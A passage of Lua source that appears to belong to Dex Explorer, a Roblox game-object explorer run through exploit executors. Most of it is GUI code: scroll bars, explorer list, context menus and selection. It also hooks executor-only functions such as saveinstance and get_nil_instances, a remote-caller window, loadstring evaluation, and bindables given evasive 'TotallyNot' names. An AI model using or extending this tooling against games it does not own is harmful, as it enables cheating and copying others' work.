UDim2.new(0,GUI_SIZE,0,GUI_SIZE) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=GuiColor.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=GuiColor.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Explorer panel local explorerPanel = D_E_X.ExplorerPanel Create(explorerPanel,{ BackgroundColor3 = GuiColor.Field; BorderColor3 = GuiColor.Border; Active = true; }) local SettingsRemote = explorerPanel.Parent:WaitForChild("SettingsPanel"):WaitForChild("GetSetting") local GetApiRemote = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("GetApi") local GetAwaitRemote = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("GetAwaiting") local bindSetAwaiting = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("SetAwaiting") local SaveInstanceWindow = explorerPanel.Parent:WaitForChild("SaveInstance") local ConfirmationWindow = explorerPanel.Parent:WaitForChild("Confirmation") local CautionWindow = explorerPanel.Parent:WaitForChild("Caution") local TableCautionWindow = explorerPanel.Parent:WaitForChild("TableCaution") local RemoteWindow = explorerPanel.Parent:WaitForChild("CallRemote") local ScriptEditor = explorerPanel.Parent:WaitForChild("ScriptEditor") local ScriptEditorEvent = ScriptEditor:WaitForChild("OpenScript") local CurrentSaveInstanceWindow local CurrentRemoteWindow local lastSelectedNode local DexStorage local DexStorageMain local DexStorageEnabled if saveinstance then DexStorageEnabled = true end if DexStorageEnabled then DexStorage = Instance.new("Folder") DexStorage.Name = "Dex" DexStorageMain = Instance.new("Folder",DexStorage) DexStorageMain.Name = "DexStorage" end local NilStorage local NilStorageMain local NilStorageEnabled if get_nil_instances and IfThisFunctionWasStableEnough then NilStorageEnabled = true end if NilStorageEnabled then NilStorage = Instance.new("Folder") NilStorage.Name = "Dex Internal Storage" NilStorageMain = Instance.new("Folder",NilStorage) NilStorageMain.Name = "Nil Instances" end local listFrame = Create('Frame',{ Name = "List"; BackgroundTransparency = 1; ClipsDescendants = true; Position = UDim2.new(0,0,0,HEADER_SIZE); Size = UDim2.new(1,-GUI_SIZE,1,-HEADER_SIZE); Parent = explorerPanel; }) local scrollBar = ScrollBar(false) scrollBar.PageIncrement = 1 Create(scrollBar.GUI,{ Position = UDim2.new(1,-GUI_SIZE,0,HEADER_SIZE); Size = UDim2.new(0,GUI_SIZE,1,-HEADER_SIZE); Parent = explorerPanel; }) local scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = GUI_SIZE Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,-GUI_SIZE); Size = UDim2.new(1,-GUI_SIZE,0,GUI_SIZE); Visible = false; Parent = explorerPanel; }) local headerFrame = Create('Frame',{ Name = "Header"; BackgroundColor3 = GuiColor.Background; BorderColor3 = GuiColor.Border; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,HEADER_SIZE); Parent = explorerPanel; Create('TextLabel',{ Text = "Explorer"; BackgroundTransparency = 1; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,4,0,0); Size = UDim2.new(1,-4,0.5,0); }); }) local explorerFilter = Create('TextBox',{ Text = "Filter Workspace"; BackgroundTransparency = 0.8; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,4,0.5,0); Size = UDim2.new(1,-8,0.5,-2); }); explorerFilter.Parent = headerFrame SetZIndexOnChanged(explorerPanel) local function CreateColor3(r, g, b) return Color3.new(r/255,g/255,b/255) end local Styles = { Font = Enum.Font.Arial; Margin = 5; Black = CreateColor3(0,0,0); White = CreateColor3(255,255,255); } local DropDown = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextColor = CreateColor3(0,0,0); TextColorOver = Styles.White; TextXAlignment = Enum.TextXAlignment.Left; Height = 20; BackColor = Styles.White; BackColorOver = CreateColor3(86,125,188); BorderColor = CreateColor3(216,216,216); BorderSizePixel = 2; ArrowColor = CreateColor3(160,160,160); ArrowColorOver = Styles.Black; } local Row = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextXAlignment = Enum.TextXAlignment.Left; TextColor = Styles.Black; TextColorOver = Styles.White; TextLockedColor = CreateColor3(120,120,120); Height = 24; BorderColor = CreateColor3(216,216,216); BackgroundColor = Styles.White; BackgroundColorAlternate = CreateColor3(246,246,246); BackgroundColorMouseover = CreateColor3(211,224,244); TitleMarginLeft = 15; } local currentRightClickMenu local CurrentInsertObjectWindow local CurrentFunctionCallerWindow local RbxApi function ClassCanCreate(IName) local success,err = pcall(function() Instance.new(IName) end) if err then return false else return true end end function GetClasses() if RbxApi == nil then return {} end local classTable = {} for i,v in pairs(RbxApi.Classes) do if ClassCanCreate(v.Name) then table.insert(classTable,v.Name) end end return classTable end local function sortAlphabetic(t, property) table.sort(t, function(x,y) return x[property] < y[property] end) end local function FunctionIsHidden(functionData) local tags = functionData["tags"] for _,name in pairs(tags) do if name == "deprecated" or name == "hidden" or name == "writeonly" then return true end end return false end local function GetAllFunctions(className) local class = RbxApi.Classes[className] local functions = {} if not class then return functions end while class do if class.Name == "Instance" then break end for _,nextFunction in pairs(class.Functions) do if not FunctionIsHidden(nextFunction) then table.insert(functions, nextFunction) end end class = RbxApi.Classes[class.Superclass] end sortAlphabetic(functions, "Name") return functions end function GetFunctions() if RbxApi == nil then return {} end local List = SelectionVar():Get() if #List == 0 then return end local MyObject = List[1] local functionTable = {} for i,v in pairs(GetAllFunctions(MyObject.ClassName)) do table.insert(functionTable,v) end return functionTable end function CreateInsertObjectMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local totalSize = explorerPanel.Parent.AbsoluteSize.y if #choices == 0 then return end table.sort(choices, function(a,b) return a < b end) local frame = Instance.new("Frame") frame.Name = "InsertObject" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; --[[ local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame --]] local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then --frame:Destroy() CurrentInsertObjectWindow.Visible = false end end local function showMenu() expanded = true menu = Instance.new("ScrollingFrame") menu.Size = UDim2.new(0,200,1,0) menu.CanvasSize = UDim2.new(0, 200, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 0) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.TopImage = "rbxasset://textures/blackBkg_square.png" menu.MidImage = "rbxasset://textures/blackBkg_square.png" menu.BottomImage = "rbxasset://textures/blackBkg_square.png" menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name, function() choice(name) end,1) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function CreateFunctionCallerMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local totalSize = explorerPanel.Parent.AbsoluteSize.y if #choices == 0 then return end table.sort(choices, function(a,b) return a.Name < b.Name end) local frame = Instance.new("Frame") frame.Name = "InsertObject" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then --frame:Destroy() CurrentInsertObjectWindow.Visible = false end end local function showMenu() expanded = true menu = Instance.new("ScrollingFrame") menu.Size = UDim2.new(0,300,1,0) menu.CanvasSize = UDim2.new(0, 300, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 0) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.TopImage = "rbxasset://textures/blackBkg_square.png" menu.MidImage = "rbxasset://textures/blackBkg_square.png" menu.BottomImage = "rbxasset://textures/blackBkg_square.png" menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function GetParameters(functionData) local paraString = "" paraString = paraString.."(" for i,v in pairs(functionData.Arguments) do paraString = paraString..v.Type.." "..v.Name if i < #functionData.Arguments then paraString = paraString..", " end end paraString = paraString..")" return paraString end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name.ReturnType.." "..name.Name..GetParameters(name), function() choice(name) end,2) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function CreateInsertObject() if not CurrentInsertObjectWindow then return end CurrentInsertObjectWindow.Visible = true if currentRightClickMenu and CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Position = UDim2.new(0,currentRightClickMenu.Position.X.Offset-currentRightClickMenu.Size.X.Offset-2,0,0) end if CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Parent = explorerPanel.Parent end end function CreateFunctionCaller() if CurrentFunctionCallerWindow then CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil end CurrentFunctionCallerWindow = CreateFunctionCallerMenu( GetFunctions(), "", false, function(option) CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil local list = SelectionVar():Get() for i = 1,#list do pcall(function() Instance.new(option,list[i]) end) end print(option.Name .. " selected to be called. Function caller being added soon, please wait!") --CallFunction() DestroyRightClick() end ) if currentRightClickMenu and CurrentFunctionCallerWindow then CurrentFunctionCallerWindow.Position = UDim2.new(0,currentRightClickMenu.Position.X.Offset-currentRightClickMenu.Size.X.Offset*1.5-2,0,0) end if CurrentFunctionCallerWindow then CurrentFunctionCallerWindow.Parent = explorerPanel.Parent end end function CreateRightClickMenuItem(text, onClick, insObj) local button = Instance.new("TextButton") button.Font = DropDown.Font button.FontSize = DropDown.FontSize button.TextColor3 = DropDown.TextColor button.TextXAlignment = DropDown.TextXAlignment button.BackgroundColor3 = DropDown.BackColor button.AutoButtonColor = false button.BorderSizePixel = 0 button.Active = true button.Text = text if insObj == 1 then local newIcon = Icon(nil,ExplorerIndex[text] or 0) newIcon.Position = UDim2.new(0,0,0,2) newIcon.Size = UDim2.new(0,16,0,16) newIcon.IconMap.ZIndex = 5 newIcon.Parent = button button.Text = "\t\t"..button.Text elseif insObj == 2 then button.FontSize = Enum.FontSize.Size11 end button.MouseEnter:connect(function() button.TextColor3 = DropDown.TextColorOver button.BackgroundColor3 = DropDown.BackColorOver if not insObj and CurrentInsertObjectWindow then if CurrentInsertObjectWindow.Visible == false and button.Text == "Insert Object" then CreateInsertObject() elseif CurrentInsertObjectWindow.Visible and button.Text ~= "Insert Object" then CurrentInsertObjectWindow.Visible = false end end if not insObj then if CurrentFunctionCallerWindow and button.Text ~= "Call Function" then CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil elseif button.Text == "Call Function" then CreateFunctionCaller() end end end) button.MouseLeave:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor end) button.MouseButton1Click:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor onClick(text) end) return button end function CreateRightClickMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local frame = Instance.new("Frame") frame.Name = "DropDown" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; --[[ local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame --]] local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then frame:Destroy() DestroyRightClick() end end local function showMenu() expanded = true menu = Instance.new("Frame") menu.Size = UDim2.new(0, 200, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 5) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name, function() choice(name) end) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function checkMouseInGui(gui) if gui == nil then return false end local plrMouse = game:GetService("Players").LocalPlayer:GetMouse() local guiPosition = gui.AbsolutePosition local guiSize = gui.AbsoluteSize if plrMouse.X >= guiPosition.x and plrMouse.X <= guiPosition.x + guiSize.x and plrMouse.Y >= guiPosition.y and plrMouse.Y <= guiPosition.y + guiSize.y then return true else return false end end local clipboard = {} local function delete(o) Destroy(o) end local getTextWidth do local text = Create('TextLabel',{ Name = "TextWidth"; TextXAlignment = 'Left'; TextYAlignment = 'Center'; Font = FONT; FontSize = FONT_SIZE; Text = ""; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,1,0); Visible = false; Parent = explorerPanel; }) function getTextWidth(s) text.Text = s return text.TextBounds.x end end local nameScanned = false -- Holds the game tree converted to a list. local TreeList = {} -- Matches objects to their tree node representation. local NodeLookup = {} local nodeWidth = 0 local QuickButtons = {} function filteringWorkspace() if explorerFilter.Text ~= "" and explorerFilter.Text ~= "Filter Workspace" then return true end return false end function lookForAName(obj,name) for i,v in pairs(obj:GetChildren()) do if string.find(string.lower(v.Name),string.lower(name)) then nameScanned = true end lookForAName(v,name) end end function scanName(obj) nameScanned = false if string.find(string.lower(obj.Name),string.lower(explorerFilter.Text)) then nameScanned = true else lookForAName(obj,explorerFilter.Text) end return nameScanned end function updateActions() for i,v in pairs(QuickButtons) do if v.Cond() then v.Toggle(true) else v.Toggle(false) end end end local updateList,rawUpdateList,updateScroll,rawUpdateSize do local function r(t) for i = 1,#t do if not filteringWorkspace() or scanName(t[i].Object) then TreeList[#TreeList+1] = t[i] local w = (t[i].Depth)*(2+ENTRY_PADDING+GUI_SIZE) + 2 + ENTRY_SIZE + 4 + getTextWidth(t[i].Object.Name) + 4 if w > nodeWidth then nodeWidth = w end if t[i].Expanded or filteringWorkspace() then r(t[i]) end end end end function rawUpdateSize() scrollBarH.TotalSpace = nodeWidth scrollBarH.VisibleSpace = listFrame.AbsoluteSize.x scrollBarH:Update() local visible = scrollBarH:CanScrollDown() or scrollBarH:CanScrollUp() scrollBarH.GUI.Visible = visible listFrame.Size = UDim2.new(1,-GUI_SIZE,1,-GUI_SIZE*(visible and 1 or 0) - HEADER_SIZE) scrollBar.VisibleSpace = math.ceil(listFrame.AbsoluteSize.y/ENTRY_BOUND) scrollBar.GUI.Size = UDim2.new(0,GUI_SIZE,1,-GUI_SIZE*(visible and 1 or 0) - HEADER_SIZE) scrollBar.TotalSpace = #TreeList+1 scrollBar:Update() end function rawUpdateList() -- Clear then repopulate the entire list. It appears to be fast enough. TreeList = {} nodeWidth = 0 r(NodeLookup[game:GetService("Workspace").Parent]) if DexStorageEnabled then r(NodeLookup[DexStorage]) end if NilStorageEnabled then r(NodeLookup[NilStorage]) end rawUpdateSize() updateActions() end -- Adding or removing large models will cause many updates to occur. We -- can reduce the number of updates by creating a delay, then dropping any -- updates that occur during the delay. local updatingList = false function updateList() if updatingList then return end updatingList = true wait(0.25) updatingList = false rawUpdateList() end local updatingScroll = false function updateScroll() if updatingScroll then return end updatingScroll = true wait(0.25) updatingScroll = false scrollBar:Update() end end local Selection do local bindGetSelection = explorerPanel:FindFirstChild("TotallyNotGetSelection") if not bindGetSelection then bindGetSelection = Create('BindableFunction',{Name = "TotallyNotGetSelection"}) bindGetSelection.Parent = explorerPanel end local bindSetSelection = explorerPanel:FindFirstChild("TotallyNotSetSelection") if not bindSetSelection then bindSetSelection = Create('BindableFunction',{Name = "TotallyNotSetSelection"}) bindSetSelection.Parent = explorerPanel end local bindSelectionChanged = explorerPanel:FindFirstChild("TotallyNotSelectionChanged") if not bindSelectionChanged then bindSelectionChanged = Create('BindableEvent',{Name = "TotallyNotSelectionChanged"}) bindSelectionChanged.Parent = explorerPanel end local SelectionList = {} local SelectionSet = {} local Updates = true Selection = { Selected = SelectionSet; List = SelectionList; } local function addObject(object) -- list update local lupdate = false -- scroll update local supdate = false if not SelectionSet[object] then local node = NodeLookup[object] if node then table.insert(SelectionList,object) SelectionSet[object] = true node.Selected = true -- expand all ancestors so that selected node becomes visible node = node.Parent while node do if not node.Expanded then node.Expanded = true lupdate = true end node = node.Parent end supdate = true end end return lupdate,supdate end function Selection:Set(objects) local lupdate = false local supdate = false if #SelectionList > 0 then for i = 1,#SelectionList do local object = SelectionList[i] local node = NodeLookup[object] if node then node.Selected = false SelectionSet[object] = nil end end SelectionList = {} Selection.List = SelectionList supdate = true end for i = 1,#objects do local l,s = addObject(objects[i]) lupdate = l or lupdate supdate = s or supdate end if lupdate then rawUpdateList() supdate = true elseif supdate then scrollBar:Update() end if supdate then bindSelectionChanged:Fire() updateActions() end end function Selection:Add(object) local l,s = addObject(object) if l then rawUpdateList() if Updates then bindSelectionChanged:Fire() updateActions() end elseif s then scrollBar:Update() if Updates then bindSelectionChanged:Fire() updateActions() end end end function Selection:StopUpdates() Updates = false end function Selection:ResumeUpdates() Updates = true bindSelectionChanged:Fire() updateActions() end function Selection:Remove(object,noupdate) if SelectionSet[object] then local node = NodeLookup[object] if node then node.Selected = false SelectionSet[object] = nil for i = 1,#SelectionList do if SelectionList[i] == object then table.remove(SelectionList,i) break end end if not noupdate then scrollBar:Update() end bindSelectionChanged:Fire() updateActions() end end end function Selection:Get() local list = {} for i = 1,#SelectionList do list[i] = SelectionList[i] end return list end bindSetSelection.OnInvoke = function(...) Selection:Set(...) end bindGetSelection.OnInvoke = function() return Selection:Get() end end function CreateCaution(title,msg) local newCaution = CautionWindow:Clone() newCaution.Title.Text = title newCaution.MainWindow.Desc.Text = msg newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Ok.MouseButton1Up:connect(function() newCaution:Destroy() end) end function CreateTableCaution(title,msg) if type(msg) ~= "table" then return CreateCaution(title,tostring(msg)) end local newCaution = TableCautionWindow:Clone() newCaution.Title.Text = title local TableList = newCaution.MainWindow.TableResults local TableTemplate = newCaution.MainWindow.TableTemplate for i,v in pairs(msg) do local newResult = TableTemplate:Clone() newResult.Type.Text = type(v) newResult.Value.Text = tostring(v) newResult.Position = UDim2.new(0,0,0,#TableList:GetChildren() * 20) newResult.Parent = TableList TableList.CanvasSize = UDim2.new(0,0,0,#TableList:GetChildren() * 20) newResult.Visible = true end newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Ok.MouseButton1Up:connect(function() newCaution:Destroy() end) end local function Split(str, delimiter) local start = 1 local t = {} while true do local pos = string.find (str, delimiter, start, true) if not pos then break end table.insert (t, string.sub (str, start, pos - 1)) start = pos + string.len (delimiter) end table.insert (t, string.sub (str, start)) return t end local function ToValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Number" then return tonumber(value) elseif type == "String" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) elseif type == "Script" then local success,err = ypcall(function() _G.D_E_X_DONOTUSETHISPLEASE = nil loadstring( "_G.D_E_X_DONOTUSETHISPLEASE = "..value )() return _G.D_E_X_DONOTUSETHISPLEASE end) if err then return nil end else return nil end end local function ToPropValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Content" then return value elseif type == "float" or type == "int" or type == "double" then return tonumber(value) elseif type == "string" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) elseif string.sub(value,1,4) == "Enum" then local getEnum = value while true do local x,y = string.find(getEnum,".") if y then getEnum = string.sub(getEnum,y+1) else break end end print(getEnum) return getEnum else return nil end end function PromptRemoteCaller(inst) if CurrentRemoteWindow then 